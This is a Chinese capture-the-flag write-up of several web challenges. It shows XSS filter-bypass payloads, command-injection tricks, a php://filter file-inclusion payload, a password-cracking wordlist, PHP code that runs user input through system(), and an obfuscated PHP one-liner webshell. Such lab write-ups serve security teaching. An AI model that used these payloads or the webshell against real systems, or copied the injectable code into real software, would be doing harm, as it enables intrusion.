2025 polarctf春季个人挑战赛web方向wp
来个弹窗
先用最基础的xss弹窗试一下
<script>alert("xss")</script>
没有内容,猜测过滤了script,双写绕过一下
<scrscriptipt>alert("xss")</scscriptript>
background
查看网页源代码
查看一下js文件
类似于一个命令执行,d为输出,p为动作
0e事件
考察MD5碰撞
复读机RCE
提示不能说,尝试echo一下
可以命令执行
xCsMsD
随便注册一个账号登陆进去
在cmd框下可以执行命令,但是存在过滤
查看下cookies,解个码
这里有一个替换,空格替换成-,\替换成/
所以这里就使用命令
cat-文件来读取文件内容
这里可以使用tac绕过
coke的登陆
查看提示
猜测可能为密码
成功登录,flag在源代码
bllbl_rce
扫描一下目录,发现/admin/admin.php
下载源码
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Command Query Tool</title>
</head>
<body>
<h1>Command Query Tool</h1>
<form action="index.php" method="post"><label for="command">输入你的命令</label><input type="text" id="command" name="command" required><button type="submit">执行</button>
</form><?php
if (isset($_POST['command'])) {$command = $_POST['command'];if (strpos($command, 'bllbl') === false) {die("no");}echo "<pre>";system ($command);echo "</pre>";
}
?>
</body>
</html>
我们执行命令需要出现bllbl字符,这里可以用&&拼接
椰子树晕淡水鱼
猜测存在文件包含漏洞,扫描一下目录:/password /admin.php
下载一个zip文件
爆破一下压缩包密码
密码字典:
zhsh
2004
yzhsh
y2004
y183
zhshy
zhshzhsh
zhshzs
zhsh2004
zhsh183
zszhsh
zszs
zs2004
zs183
2004y
2004zhsh
2004zs
20042004
2004183
183y
183zhsh
183zs
1832004
183183
yyzhsh
yyzs
yy2004
yy183
yzhshy
yzhshzhsh
yzhshzs
yzhsh2004
yzhsh183
yzsy
yzszhsh
yzszs
yzs2004
yzs183
y2004y
y2004zhsh
y2004zs
y20042004
y2004183
y183y
y183zhsh
y183zs
y1832004
y183183
zhshyy
zhshyzhsh
zhshyzs
zhshy2004
zhshy183
zhshzhshy
zhshzhshzhsh
zhshzhshzs
zhshzhsh2004
zhshzhsh183
zhshzsy
zhshzszhsh
zhshzszs
zhshzs2004
zhshzs183
zhsh2004y
zhsh2004zhsh
zhsh2004zs
zhsh20042004
zhsh2004183
zhsh183y
zhsh183zhsh
zhsh183zs
zhsh1832004
zhsh183183
zsyy
zsyzhsh
zsyzs
zsy2004
zsy183
zszhshy
zszhshzhsh
zszhshzs
zszhsh2004
zszhsh183
zszsy
zszszhsh
zszszs
zszs2004
zszs183
zs2004y
zs2004zhsh
zs2004zs
zs20042004
zs2004183
zs183y
zs183zhsh
zs183zs
zs1832004
zs183183
2004yy
2004yzhsh
2004yzs
2004y2004
2004y183
2004zhshy
2004zhshzhsh
2004zhshzs
2004zhsh2004
2004zhsh183
2004zsy
2004zszhsh
2004zszs
2004zs2004
2004zs183
20042004y
20042004zhsh
20042004zs
200420042004
20042004183
2004183y
2004183zhsh
2004183zs
20041832004
2004183183
183yy
183yzhsh
183yzs
183y2004
183y183
183zhshy
183zhshzhsh
183zhshzs
183zhsh2004
183zhsh183
183zsy
183zszhsh
183zszs
183zs2004
183zs183
1832004y
1832004zhsh
1832004zs
18320042004
1832004183
183183y
183183zhsh
183183zs
1831832004
183183183
yzhsh
y2004
y183
zhshy
zhsh920
zhshzs
zhsh2004
zhsh183
zszhsh
zszs
zs2004
zs183
2004y
2004zhsh
2004zs
20042004
2004183
183y
183zhsh
183zs
1832004
183183
yyzhsh
yyzs
yy2004
yy183
yzhshy
yzhshzhsh
yzhshzs
yzhsh2004
yzhsh183
yzsy
yzszhsh
yzszs
yzs2004
yzs183
y2004y
y2004zhsh
y2004zs
y20042004
y2004183
y183y
y183zhsh
y183zs
y1832004
y183183
zhshyy
zhshyzhsh
zhshyzs
zhshy2004
zhshy183
zhshzhshy
zhshzhshzhsh
zhshzhshzs
zhshzhsh2004
zhshzhsh183
zhshzsy
zhshzszhsh
zhshzszs
zhshzs2004
zhshzs183
zhsh2004y
zhsh2004zhsh
zhsh2004zs
zhsh20042004
zhsh2004183
zhsh183y
zhsh183zhsh
zhsh183zs
zhsh1832004
zhsh183183
zsyy
zsyzhsh
zsyzs
zsy2004
zsy183
zszhshy
zszhshzhsh
zszhshzs
zszhsh2004
zszhsh183
zszsy
zszszhsh
zszszs
zszs2004
zszs183
zs2004y
zs2004zhsh
zs2004zs
zs20042004
zs2004183
zs183y
zs183zhsh
zs183zs
zs1832004
zs183183
2004yy
2004yzhsh
2004yzs
2004y2004
2004y183
2004zhshy
2004zhshzhsh
2004zhshzs
2004zhsh2004
2004zhsh183
2004zsy
2004zszhsh
2004zszs
2004zs2004
2004zs183
20042004y
20042004zhsh
20042004zs
200420042004
20042004183
2004183y
2004183zhsh
2004183zs
20041832004
2004183183
183yy
183yzhsh
183yzs
183y2004
183y183
183zhshy
183zhshzhsh
183zhshzs
183zhsh2004
183zhsh183
183zsy
183zszhsh
183zszs
183zs2004
183zs183
1832004y
1832004zhsh
1832004zs
18320042004
1832004183
183183y
183183zhsh
183183zs
1831832004
183183183
zhsh/zhsh920
一个文件上传
再给我30元
查看网页源代码
提示参数为id
这里使用sqlmap
狗黑子CTF变强之路
扫描一下目录:/admin.php
这里可能存在文件包含漏洞
使用为协议读取一下admin.php
?page=php://filter/convert.base64-encode/resource=admin.php
解码
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {// 硬编码的用户名和密码$correctUsername = "ggouheizi";$correctPassword = "zigouhei";$username = $_POST['username'];$password = $_POST['password'];if ($username == $correctUsername && $password == $correctPassword) {// 登录成功,直接跳转到 gougougou.phpheader("Location: gougougou.php");exit;} else {$errorMessage = "用户名或密码错误,请重新输入。";}
}
?><!DOCTYPE html>
<html><head><title>秘境遗迹</title><style>body {font-family: Arial, sans-serif;background-color: #f4f4f4;}form {background-color: white;padding: 20px;border-radius: 10px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);width: 300px;position: absolute;top: 50%;left: 50%;transform: translate(-50%, -50%);}label {display: block;margin-bottom: 5px;font-weight: bold;}input[type="text"],input[type="password"] {width: 100%;padding: 10px;margin-bottom: 15px;border: 1px solid #ccc;border-radius: 5px;box-sizing: border-box;transition: border-color 0.3s ease;}input[type="text"]:focus,input[type="password"]:focus {border-color: #4CAF50;}input[type="submit"] {padding: 10px 20px;background-color: #4CAF50;color: white;border: none;border-radius: 5px;cursor: pointer;transition: background-color 0.3s ease;}input[type="submit"]:hover {background-color: #45a049;}</style>
</head><body><form method="post"><label for="username">用户名:</label><br><input type="text" name="username"><br><label for="password">密码:</label><br><input type="password" name="password"><br><br><input type="submit" value="登录"><?php if(isset($errorMessage)) { echo $errorMessage; }?></form>
</body></html>
再读取gougougou.php文件
<?php
$gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
$gou2="bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09";
$gou3="tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=";
$gou4=$gou1{20}.$gou1{41}.$gou1{13}.$gou1{38}.$gou1{6}.$gou1{9}.$gou1{1}.$gou1{25}.$gou1{2};
$gou5=$gou2{30}.$gou2{27}.$gou2{51}.$gou2{0}.$gou2{44}.$gou2{1}.$gou2{28}.$gou2{30}.$gou2{79}.$gou2{87}.$gou2{61}.$gou2{61}.$gou2{79};
$gou6=$gou1{34}.$gou3{36}.$gou1{39}.$gou3{41}.$gou1{47}.$gou3{0}.$gou3{20}.$gou3{16}.$gou3{62}.$gou3{62}.$gou3{159}.$gou3{3}.$gou1{37}.$gou3{231};
#$gou7=Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ==;
?>
混淆解码后为一句话木马,密码为cmd
小白说收集很重要
看题目意思就知道要目录扫描
admin/admin123456
根据题目要求,生成密码
sysadmin/xiaobai
相关文章:
2025 polarctf春季个人挑战赛web方向wp
来个弹窗 先用最基础的xss弹窗试一下 <script>alert("xss")</script>没有内容,猜测过滤了script,双写绕过一下 <scrscriptipt>alert("xss")</scscriptript>background 查看网页源代码 查看一下js文件 类…...
RabbitMQ 学习整理1 - 基础使用
项目代码:RabbitMQDemo: 学习RabbitMQ的一些整理 基本概念 RabbitMQ是一种基于AMQP协议的消息队列实现框架RabbitMQ可以用于在系统与系统之间或者微服务节点之间,进行消息缓存,消息广播,消息分配以及限流消峰处理RabbitMQ-Serve…...
分布式渲染与云渲染:技术与应用的黄金搭档
一、核心概念:先区分再关联 分布式渲染是通过多台设备并行计算拆分渲染任务的技术(如将一帧拆分为 64 个小块,64 台电脑同时渲染); 云渲染是基于云计算的渲染服务,本质是分布式渲染的商业化落地—— 用户无…...
【实战ES】实战 Elasticsearch:快速上手与深度实践-5.2.1 多字段权重控制(标题、品牌、类目)
👉 点击关注不迷路 👉 点击关注不迷路 👉 点击关注不迷路 文章大纲 电商商品搜索实战:多字段权重控制策略1. 业务场景与核心挑战1.1 典型搜索问题1.2 权重失衡的影响数据 2. 权重控制核心方案2.1 字段权重分配矩阵2.2 多策略组合方…...
如何避免测试数据准备不充分或不可复用
避免测试数据准备不充分或不可复用的关键方法包括明确数据需求、统一数据管理工具、建立数据复用机制、定期维护更新测试数据以及加强团队沟通与协作。 其中,统一数据管理工具对确保数据质量和复用性尤为重要。例如,许多团队采用专门的测试数据管理工具以…...
使用AI一步一步实现若依(23)
功能23:从后端获取路由/菜单数据 功能22:用户管理 功能21:使用axios发送请求 功能20:使用分页插件 功能19:集成MyBatis-Plus 功能18:创建后端工程 功能17:菜单管理 功能16:角色管理…...
概念讲解)
C语言的内存模型 (堆区,栈区,静态区,常量区,代码区 )概念讲解
C语言的内存模型分为5个区: 堆区,栈区,静态区,常量区,代码区 。 1、栈区 存放函数的参数值,局部变量等。 由编译器自动分配和释放。通常在函数执行完了就释放了。其操作方式类似于数据结构中的栈。栈内存…...
Vue3 知识点总结
Vue3 知识点总结 1. 核心概念 1.1 Composition API 1.1.1 setup 函数 setup是Vue3中的新的配置项,是组件内使用Composition API的入口在setup中定义的变量和方法需要return才能在模板中使用setup执行时机在beforeCreate之前,this不可用 export defa…...
第一天学爬虫
阅读提示:我今天才开始尝试爬虫,写的不好请见谅。 一、准备工具 requests库:发送HTTP请求并获取网页内容。BeautifulSoup库:解析HTML页面并提取数据。pandas库:保存抓取到的数据到CSV文件中。 二、爬取步骤 发送请求…...
W、M、C练题笔记(持续更新中)
web here are the flag 点击,页面跳转404.php,用bp抓包访问/flag.php页面,得到flag用base64解码 TryToFindFlag 打开后查看源代码 发现是robots协议,访问robots.txt 访问flllaaa......,得到空白页面,查看…...
CVE-2021-45232未授权接口练习笔记
CVE-2021-45232 是 Apache APISIX Dashboard 中的一个严重权限漏洞,类似于攻击者无需密码即可拿到整个网关系统的“万能钥匙”。攻击者利用此漏洞,可直接操控网关流量转发规则,甚至远程执行代码,引发服务器沦陷。 默认账户密码导致…...
贪心算法——c#
贪心算法通俗解释 贪心算法是一种"每一步都选择当前最优解"的算法策略。它不关心全局是否最优,而是通过局部最优的累积来逼近最终解。优点是简单高效,缺点是可能无法得到全局最优解。 一句话秒懂 自动售货机找零钱:用最少数量的…...
Retrofit中scalars转换html为字符串
简介 在Retrofit中,如果你想直接获取HTML或其他文本格式的响应内容而不是将其映射到一个模型类,ScalarsConverterFactory 就派上用场了。ScalarsConverterFactory 是一个转换器工厂,它能够将响应体转换为Java基本类型如String、Integer或Byte…...
【微服务架构】SpringCloud(七):配置中心 Spring Cloud Config
文章目录 配置中心为什么需要配置中心配置中心介绍 服务搭建基于GITHUB1.创建仓库2.新建微服务作为配置中心服务3.启动测试拉取 匹配规则分支读取 客户端配置配置文件引入依赖使用远程配置 刷新配置手动配置热更新自动刷新erlang安装RabbitMQ安装环境变量管理界面服务配置测试 …...
突破次元壁:基于Unity的MCP方案,用Claude一键生成完整游戏
在当今快速发展的技术领域,AI与游戏开发的结合正带来前所未有的创新。今天,我们将介绍一种革命性的解决方案——基于Unity的MCP(Model-Code-Pipeline)方案,通过Claude的强大自然语言处理能力,直接生成可玩的游戏!只需简单输入提示词,AI就能自动打开Unity并为你开发出一…...
Linux学习笔记(应用篇二)
基于I.MX6ULL.MINI开发板 开发板与电脑相互通信电脑与开发板互传文件 开发板与电脑相互通信 用网线将电脑与开发板连接 本人使用的是Ubuntu系统,不是虚拟机 一般来说刚开始电脑和开发板是ping不通的 首先查看电脑的 IP WinR,cmd调出终端 我使用的是…...
记录一次部署k3s后,服务404 page not found,nginx显示正常
服务部署k3s后,正常入口端怎么返回都是80,且返回错误 TRAEFIK DEFAULT CERT ERR_CERT_AUTHORITY_INVALID ngnix显示也是正常,怎么找也找不到问题 后来通过 iptables -L -n -t nat|grep 80 发现入口端流量被DNAT转到新的服务 而k3s中&#…...
mac上安装nvm及nvm的基本语法使用!!
种一棵树,最好是十年前,其次是现在!想要改变,从此刻开始,一切都不晚! 目录 nvm是什么?前提条件:安装homebrew如果系统已经有node版本:在mac上安装nvm:用nvm安…...
(基本常识)C++中const与引用——面试常问
作者:求一个demo 版权声明:著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处 内容通俗易懂,没有废话,文章最后是面试常问内容(建议通过标题目录学习) 废话不多…...
ES 加入高亮设置
searchTextQueryOne new MatchQuery.Builder().field(searchFieldOne).query(searchText).build();// 帮助中心文档切分 只查询6条Integer finalTopK 10;List<String> newReturnFileds returnFields;newReturnFileds.add("kid"); // 需要返回kidHighlight h…...
dfs(深度优先)——太抽象了
1. 两种方法 #include<bits/stdc.h> using namespace std; //void dfs(int index,int n,vector<int> current) //{ // if(index>n){ // for(int i0;i<current.size();i){ // cout<<current[i]<<" "; // } // cout<<endl;…...
)
5分钟学会interface(纯标题党)
Golang中的interface(接口) 接口的定义 在 Go 语言中,接口(interface) 是一种特殊的类型,它定义了一组方法,而不关心具体的实现。任何类型只要实现了这些方法,就可以被认为满足这个…...
deepseek实战教程-第五篇支持deepseek的大模型应用安装及使用
目录 一.AnythingLLM 1.2 设置管理 1.3 关联知识库到对话 二.Cherrystudio 2.1 添加知识库文件 2.1.1 cherrystudio 2.1.2 anythingLLM 2.2 和知识库对话 三.AI产品落地之DIFY 3.1 安装Docker 3.2 下载dify压缩包 3.3 文件解压缩 3.4 文件重命名 3.5 设置模型 …...
嵌入式Linux RK3399启动模式及分区技术详解
嵌入式Linux RK3399启动模式及分区技术详解 一、RK3399启动模式分析 RK3399作为瑞芯微推出的高性能嵌入式处理器,其启动模式分为闭源与开源两种方案,核心区别在于前级Loader的实现方式。 1. 闭源启动流程 采用瑞芯微官方提供的闭源固件,流…...
python --face_recognition(人脸识别,检测,特征提取,绘制鼻子,眼睛,嘴巴,眉毛)/活体检测
dlib 安装方法 之前博文 https://blog.csdn.net/weixin_44634704/article/details/141332644 环境: python3.8 opencv-python4.11.0.86 face_recognition1.3.0 dlib19.24.6人脸检测 import cv2 import face_recognition# 读取人脸图片 img cv2.imread(r"C:\Users\123\…...
redis解决缓存穿透/击穿/雪崩
文章目录 1.缓存穿透1.1 概念1.2 解决方案1.2.1 缓存空对象1.2.2 布隆过滤 1.2 店铺查询使用缓存穿透解决方案1.2.1 流程 2.缓存雪崩2.1 什么是缓存雪崩?2.2 雪崩解决方案 3.缓存击穿3.1 什么是缓存击穿?3.2解决方案3.2.1 基于互斥锁解决缓存击穿问题&am…...
)
特征工程自动化(FeatureTools实战)
目录 特征工程自动化(FeatureTools实战)1. 引言2. 项目背景与意义2.1 特征工程的重要性2.2 自动化特征工程的优势2.3 工业级数据处理需求3. 数据集生成与介绍3.1 数据集构成3.2 数据生成方法4. 自动化特征工程理论基础4.1 特征工程的基本概念4.2 FeatureTools库简介4.3 关键公…...
哈希表简单例子
一、题意 给定一个整数数组,判断数组中是否存在重复的元素。如果存在一值在数组中出现至少两次,函数返回 True ;如果数组中每个元素都不相同,则返回 False 。 输入: [1, 2, 3, 1] 输出: True 输入: [1, 2, 3, 4] 输出: False …...
利用GitHub Pages快速部署前端框架静态网页
文章目录 前言GitHub Pages 来部署前端框架(Vue 3 Vite)项目1、配置 GitHub Pages 部署2、将项目推送到 GitHub3、部署到 GitHub Pages4、访问部署页面5、修改代码后的更新部署顺序 前言 可以先参考: 使用 GitHub Pages 快速部署静态网页: …...
《TCP/IP网络编程》学习笔记 | Chapter 22:重叠 I/O 模型
《TCP/IP网络编程》学习笔记 | Chapter 22:重叠 I/O 模型 《TCP/IP网络编程》学习笔记 | Chapter 22:重叠 I/O 模型理解重叠 I/O 模型重叠 I/O本章讨论的重叠 I/O 的重点不在于 I/O 创建重叠 I/O 套接字执行重叠 I/O 的 WSASend 函数进行重叠 I/O 的 WSA…...